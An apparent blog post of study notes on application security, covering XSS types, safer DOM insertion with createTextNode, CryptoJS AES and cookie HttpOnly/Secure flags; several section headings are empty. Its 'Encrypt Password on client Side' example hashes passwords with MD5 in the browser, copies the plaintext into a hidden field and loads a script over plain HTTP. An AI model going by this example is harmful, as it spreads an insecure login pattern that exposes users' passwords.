Application Security

XSS: Cross site scripting

https://excess-xss.com/

Flaws that allow these XSS attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

It steals: transmitting private data, like cookies or other session information

  1. Stored/Persisted XSS
  2. Reflected XSS
  3. DOM based XSS
  • JavaScript has access to some of the user's sensitive information, such as cookies.
  • JavaScript can send HTTP requests with arbitrary content to arbitrary destinations by using XMLHttpRequest and other mechanisms.
  • JavaScript can make arbitrary modifications to the HTML of the current page by using DOM manipulation methods.
These facts combined can cause very serious security breaches

It's preferrable to use createTextNode insteadof simply assigning to innerHTML.
Method1:
It would append <a href='https://google.com'>HELLO</a> in the document/page

document.getElementById("answer-
28111412").appendChild(document.createTextNode("<a href='https://google.com'>HELLO</a>"))

Method2:
It would display link with the text Hello with href

document.getElementById("answer-28111412").innerHTML = "<a href='https://google.com'>HELLO</a>"

Stored/persistent XSS:






















Reflected XSS:



















DOM-based XSS:

























Encryption:

// INIT
var myString   = "https://www.titanesmedellin.com/";
var myPassword = "myPassword";


// PROCESS
var encrypted = CryptoJS.AES.encrypt(myString, myPassword);
var decrypted = CryptoJS.AES.decrypt(encrypted, myPassword);
document.getElementById("demo0").innerHTML = myString;
document.getElementById("demo1").innerHTML = encrypted;
document.getElementById("demo2").innerHTML = decrypted;
document.getElementById("demo3").innerHTML = decrypted.toString(CryptoJS.enc.Utf8);



Example2:
<html>
<head>
<title>Encrypt Password on client Side</title>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>
<script src="http://crypto-js.googlecode.com/svn/tags/3.1.2/build/rollups/md5.js"></script>
<script>
function encrypt()
{
var pass=document.getElementById('password').value;
var hide=document.getElementById('hide').value;
if(pass=="")
{
document.getElementById('err').innerHTML='Error:Password is missing';
return false;
}
else
{
document.getElementById("hide").value = document.getElementById("password").value;
var hash = CryptoJS.MD5(pass);
document.getElementById('password').value=hash;
return true;
}
}
</script>
</head>
<body>
<form class="form-signin" method="post" name="signin" id="signin">
<input type="password"  name="password" id="password" placeholder="Password" id="password" value=""  />
<input type="hidden" name="hide" id="hide" />
<div style="color:red" id="err"></div>
<input type="submit" name="login"  type="submit" onclick="return encrypt()" value="LOGIN"  >
</form>
</body>
</html>

How can you secure your HTTP cookies against XSS attacks?

XSS occurs when the attacker injects executable JavaScript code into the HTML response.
To mitigate these attacks, you have to set flags on the set-cookie HTTP header:
  • HttpOnly - this attribute is used to help prevent attacks such as cross-site scripting since it does not allow the cookie to be accessed via JavaScript.
  • secure - this attribute tells the browser to only send the cookie if the request is being sent over HTTPS.
So it would look something like this: Set-Cookie: sid=<cookie-value>; HttpOnly. If you are using Express, with express-cookie session, it is working by default.

SSL:





No comments:

Post a Comment

Subscribe to: Posts (Atom)